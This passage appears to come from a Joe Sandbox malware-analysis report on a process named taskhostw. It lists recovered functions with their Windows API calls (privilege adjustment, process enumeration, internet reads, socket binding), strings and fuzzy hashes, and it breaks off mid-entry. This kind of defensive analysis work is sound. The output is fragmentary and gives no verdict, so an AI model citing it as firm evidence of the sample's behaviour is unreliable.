Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: d57b32d860b550a7bc2b368d375ece77008db48d06ff867d2e3acad7a931e484
Instruction ID: bc4c0126a3ee79c3df5e6b1449c5581b5675b6aa5e9f60b81df08a891bb9b559
Opcode Fuzzy Hash: d57b32d860b550a7bc2b368d375ece77008db48d06ff867d2e3acad7a931e484
Instruction Fuzzy Hash: ED41EA75A00210AFEB10AF64ED86FAE77A9DF14B10F44815CFA1AAB3D3DB709D018791

Function 0021C423 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0021C4BE
CoCreateInstance.OLE32(00242D6C,00000000,00000001,00242BDC,?), ref: 0021C4D6

Part of subcall function 001B7F41: _memmove.LIBCMT ref: 001B7F82

CoUninitialize.OLE32 ref: 0021C743

Strings

.lnk, xrefs: 0021C452, 0021C47A, 0021C484

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: aaf7c0c03f7cb26aa1bda15ea4df9627f2a19c4de550689ca80904dae0788083
Instruction ID: 17ad4661051b5687fdd3fffbd7905d5272a35f6f1d8fb9e20e75bb8717dacfad
Opcode Fuzzy Hash: aaf7c0c03f7cb26aa1bda15ea4df9627f2a19c4de550689ca80904dae0788083
Instruction Fuzzy Hash: 3FA11C71118305AFD304EF64C891EABB7ECEFA5704F00495CF256971A2DB71EA4ACB62

Function 0022C104 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll), ref: 0022C112
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW,?,001F1CB7,?), ref: 0022C124

Strings

kernel32.dll, xrefs: 0022C10D
GetSystemWow64DirectoryW, xrefs: 0022C11E

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: 9c0f58e3d5b909e2281adf4fb9c79b2e1ff28304abd67edd3616109de2051f1a
Instruction ID: 2abf296bb9d70a4082e394f0020963158155bce59786f2558bc786d8fa131e93
Opcode Fuzzy Hash: 9c0f58e3d5b909e2281adf4fb9c79b2e1ff28304abd67edd3616109de2051f1a
Instruction Fuzzy Hash: 17E08674920733DFCB205F65F909A4676E4EF09344B508439D88DD2250E774C4A0CB50

Function 02A62590 Relevance: 6.6, APIs: 4, Instructions: 587COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID: __itow__swprintf
String ID:
API String ID: 674341424-0
Opcode ID: 3aaad38bc9680bd309ab71f568fa4dd4e9a0c6b95244753d1c78f3977fd1c336
Instruction ID: 609a64f2b6abf01b50ca207fd620ddee48ee252a60219f633c9940baebc8ceba
Opcode Fuzzy Hash: 3aaad38bc9680bd309ab71f568fa4dd4e9a0c6b95244753d1c78f3977fd1c336
Instruction Fuzzy Hash: F222AA726083119FCB24DF24C994B6FB7EAAF84704F00492DE99A97290DF75E944CF92

Function 0022EF21 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0022EF51
Process32FirstW.KERNEL32(00000000,?), ref: 0022EF5F

Part of subcall function 001B7F41: _memmove.LIBCMT ref: 001B7F82

Process32NextW.KERNEL32(00000000,?), ref: 0022F01F
CloseHandle.KERNEL32(00000000), ref: 0022F02E

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: 2ca81207f1bbeb7ed1a803e998b80208524e09127a9393fc02e306efd5b21557
Instruction ID: 3e324bb274fe0785be1e0cd1dd26d0dc875f82d9aed162a9e10e9e300a46cddd
Opcode Fuzzy Hash: 2ca81207f1bbeb7ed1a803e998b80208524e09127a9393fc02e306efd5b21557
Instruction Fuzzy Hash: 34518E71508311AFD310EF20EC85EABB7E8FF94710F10492DF59597291EB70A908CB92

Function 02A5DC00 Relevance: 6.0, Strings: 4, Instructions: 1004COMMON

Download Yara Rule

Strings

DdL, xrefs: 02A5E021
DdL, xrefs: 02A5E01A
DdL, xrefs: 02A9324E
DdL, xrefs: 02A93287

Memory Dump Source

Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID:
String ID: DdL$DdL$DdL$DdL
API String ID: 0-1563988167
Opcode ID: e7e71000bad2a2e74a63024352e9648c86786c9a6ef1205aee9a6705328a7e48
Instruction ID: 73db72f03a0689312812395b6b55c7dd2e5964f4ee8d15013b346f682a2ccc04
Opcode Fuzzy Hash: e7e71000bad2a2e74a63024352e9648c86786c9a6ef1205aee9a6705328a7e48
Instruction Fuzzy Hash: B2926975A00625CFCF24CF58C580AAAB7F2FF49314F6580AAED05AB351DB35E946CB84

Function 0020E928 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 0020E93A

Strings

(, xrefs: 0020E980
|, xrefs: 0020E96A

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 83b0980953ad905c906d2360b12f784c78e29aa08046b297dc3016f12f790a94
Instruction ID: a5293488953ac8f7fff80b8f21194cdc465f48763c32335f1fb1f50a37a52082
Opcode Fuzzy Hash: 83b0980953ad905c906d2360b12f784c78e29aa08046b297dc3016f12f790a94
Instruction Fuzzy Hash: 90322775A107059FCB28CF19C48196AB7F1FF48320B16C95EE49ADB3A2D770E991CB40

Function 00222404 Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 002224F7
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 0022252E

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 26717efdffefc3174513c4fc1f62f0bab82f67383a30fe77b005e260298f866f
Instruction ID: 94503ea65de372083a5a1441106253451b4bf7de9157c4ae59d73a07f5d98c01
Opcode Fuzzy Hash: 26717efdffefc3174513c4fc1f62f0bab82f67383a30fe77b005e260298f866f
Instruction Fuzzy Hash: 9B41F87192021AFFDB24DED5EC95EBBB7BCEB40314F50802AF601A7240D7B29E68D650

Function 00208AA3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 001D0F36: std::exception::exception.LIBCMT ref: 001D0F6C
Part of subcall function 001D0F36: __CxxThrowException@8.LIBCMT ref: 001D0F81

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00208AED
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00208B1A
GetLastError.KERNEL32 ref: 00208B27

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: d24ba0ebc86650e59a4cef772162789a0750fc510ca7aaf1a87a5c2ed492fcc6
Instruction ID: a83241493598f76fba7add1df43fc0bddfd975b72a817b5cfc7e859c91fdc7f4
Opcode Fuzzy Hash: d24ba0ebc86650e59a4cef772162789a0750fc510ca7aaf1a87a5c2ed492fcc6
Instruction Fuzzy Hash: C811C1B1924305AFD728DF54EC85D2BB7BCFB44314B20816EF48693251EB30EC50CA60

Function 00214A08 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00214A31
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00214A48
FreeSid.ADVAPI32(?), ref: 00214A58

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: e7e3e83419e6262c48adfa2f76f217082ccc17a0117ad50877ea9d0ca137cdbe
Instruction ID: 63e90c5f9c9fb5de36b9649852031e13fc6f47790d6342d16423b987dfd95526
Opcode Fuzzy Hash: e7e3e83419e6262c48adfa2f76f217082ccc17a0117ad50877ea9d0ca137cdbe
Instruction Fuzzy Hash: B4F04975E5130DBFDF04DFF4ED89AAEBBBCEF08201F0044A9A905E2281E6706A448B50

Function 02AD720D Relevance: 3.6, APIs: 2, Instructions: 571COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 408b997f840a905ffe582337a4dc60593b013503fe809690cd34f803e4a129d4
Instruction ID: be2fd76c5db032102e4f1722db03220d9ed21a379134a3249cc24d9ebf98cd12
Opcode Fuzzy Hash: 408b997f840a905ffe582337a4dc60593b013503fe809690cd34f803e4a129d4
Instruction Fuzzy Hash: 1812C571540218AFEB298F64CC88FBEBBB8EF49314F104569F916EA1E0EF709945CB54

Function 02AB7D32 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 02AB7D44

Part of subcall function 02A7477A: __aulldiv.LIBCMT ref: 02A747A3

Strings

0eL, xrefs: 02AB7D3B

Memory Dump Source

Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID: __aulldiv__time64
String ID: 0eL
API String ID: 325419493-3167399643
Opcode ID: f963c45ab757e4befe58fcd85888ccc5a82c6e31b363806115eba6e2896c8fcc
Instruction ID: 8e2b8f386f590a481930ed596e8d041027a2d388e3840ede9cfd08ee32f9b6aa
Opcode Fuzzy Hash: f963c45ab757e4befe58fcd85888ccc5a82c6e31b363806115eba6e2896c8fcc
Instruction Fuzzy Hash: 3321A232625610CBC729CF29D880B92B3E5EF95311F298E6CD1E6CB2D0CA75A905CF54

Function 00218932 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 00218944

Part of subcall function 001D537A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00219017,00000000,?,?,?,?,002191C8,00000000,?), ref: 001D5383
Part of subcall function 001D537A: __aulldiv.LIBCMT ref: 001D53A3

Strings

0e', xrefs: 0021893B

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID: 0e'
API String ID: 2893107130-1722422795
Opcode ID: 4726f6faa0de4a6a1080f9d206779419ff5e73ada27cc643f002ed998e9645d3
Instruction ID: f3e2d8bf2afcb77fc86f5b309965a39132c2907261aeb6e9dc8f4dab2b4d0bc4
Opcode Fuzzy Hash: 4726f6faa0de4a6a1080f9d206779419ff5e73ada27cc643f002ed998e9645d3
Instruction Fuzzy Hash: F321E432635910CBC729CF25D485A92B3E1EBA5310F688E2CE1E9CB2C0CA34B945DB50

Function 02A5D460 Relevance: 3.5, APIs: 2, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8db5ed20137469ab6f3201b90b91d7aa03eceda89041ca9ae98bc74595c0765
Instruction ID: 687fe276e8c9a4f929467036821835f8d5bf690d334e684ba761170038f2c39f
Opcode Fuzzy Hash: b8db5ed20137469ab6f3201b90b91d7aa03eceda89041ca9ae98bc74595c0765
Instruction Fuzzy Hash: 27228BB5900626DFDB24DF54C480BABB7F1FF08314F148169EC5AAB350EB34A985CB91

Function 001BE060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9451abf9eef75dad12a76c2c3a7619f9005050fb28ee5a7177e19510ed6fec6
Instruction ID: 49eeb2ef3f10de05e7d5bbc201a5f50f7d17c0d13b132f2db7150c737c1fad6b
Opcode Fuzzy Hash: d9451abf9eef75dad12a76c2c3a7619f9005050fb28ee5a7177e19510ed6fec6
Instruction Fuzzy Hash: 4622AC74A0021ADFDB24DF58C490AFEB7F1FF18310F24816AE956AB351E375A981CB91

Function 02A65C41 Relevance: 3.4, Strings: 2, Instructions: 889COMMON

Download Yara Rule

Strings

pGJ, xrefs: 02A65CB1
0DJ0EJ0FJpGJ, xrefs: 02A65DE1, 02A65DEA

Memory Dump Source

Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID:
String ID: 0DJ0EJ0FJpGJ$pGJ
API String ID: 0-2520054932
Opcode ID: 065cc444c4a8578116bc0902fafd9b31fb5deed04280f9b98aea2c83bf6d80fb
Instruction ID: 3786b216f72ed042b82be08a4c0815ad56b759bb3d411852fbb105244ea0f256
Opcode Fuzzy Hash: 065cc444c4a8578116bc0902fafd9b31fb5deed04280f9b98aea2c83bf6d80fb
Instruction Fuzzy Hash: AB726C75E00219DBDB24CF59C8947BEB7B5FF48714F14816AE919EB280EB349A81CF90

Function 02AADD28 Relevance: 3.1, Strings: 2, Instructions: 561COMMON

Download Yara Rule

Strings

|, xrefs: 02AADD6A
(, xrefs: 02AADD80

Memory Dump Source

Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID:
String ID: ($|
API String ID: 0-1631851259
Opcode ID: 59fbd3350cf74ca42bab3bb6170bdc161b43785311ed61997312106b8e649722
Instruction ID: aaca92d1eb8629db9846f6e6d1496dc272633177fe3baec40ce11687ddb94700
Opcode Fuzzy Hash: 59fbd3350cf74ca42bab3bb6170bdc161b43785311ed61997312106b8e649722
Instruction Fuzzy Hash: A9322575A00B059FCB28DF19C590A6AB7F1FF48310B15C4AEE49ADB7A1EB70E941CB44

Function 0021C75D Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0021C787
FindClose.KERNEL32(00000000), ref: 0021C7B7

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 990bdc8b6151cd5c6f92cda95baac53fcf87d9c9d9ce64a89dac239b3c1d0896
Instruction ID: 860dde4fd179d033d2e6b6fa6a83220dd87eb23ff1a189dff789ddf1bb896401
Opcode Fuzzy Hash: 990bdc8b6151cd5c6f92cda95baac53fcf87d9c9d9ce64a89dac239b3c1d0896
Instruction Fuzzy Hash: 3D11AD366102109FD710EF29D849A6AF7E8FF94324F00855EF9AAD72A1DB70AC11CF81

Function 0021A0F4 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0022957D,?,0023FB84,?), ref: 0021A121
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0022957D,?,0023FB84,?), ref: 0021A133

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: e2f29f4726f40a948bf3212d1f0b349b89530d54a6f3f2c994a357bf00ed80d6
Instruction ID: 43acaf227628045f4a035b0ab90dbeda0f4deb9d22f2bc7aac0e19050539944a
Opcode Fuzzy Hash: e2f29f4726f40a948bf3212d1f0b349b89530d54a6f3f2c994a357bf00ed80d6
Instruction Fuzzy Hash: B3F0E23551522DBBDB109FA4DC48FEA73ACFF08361F004166F809D3180D7309940CBA1

Function 002084F3 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00208631), ref: 00208508
CloseHandle.KERNEL32(?), ref: 0020851A

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: b268d0a96b47ae13dd4fc7dd78adfa8954f8401479c1b90f213d02df90e2dadb
Instruction ID: 84b11a4084fe6eb271100d20316a5093fd330cd01bf6f58d1a7431a393a95798
Opcode Fuzzy Hash: b268d0a96b47ae13dd4fc7dd78adfa8954f8401479c1b90f213d02df90e2dadb
Instruction Fuzzy Hash: 72E08631014600AFE7262F24FC08E777BE9EF04310B20842EF4D581470DB219CA0DB50

Function 001DA2D5 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 001DA2DA
UnhandledExceptionFilter.KERNEL32(?), ref: 001DA2E3

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: bc4d9e19205b1a0cd898645c49d5313279d1536f8a45808f852286ccfe04f680
Instruction ID: 44396f91d5fa32d6823516cdf86c969ec41858c13f078568a79e8274a7c8d37a
Opcode Fuzzy Hash: bc4d9e19205b1a0cd898645c49d5313279d1536f8a45808f852286ccfe04f680
Instruction Fuzzy Hash: 90B09231454248ABCA802B91FE0DB8A3F78EB45AA2F4040A0FE0D85060CB6254508A91

Function 02A7E759 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source
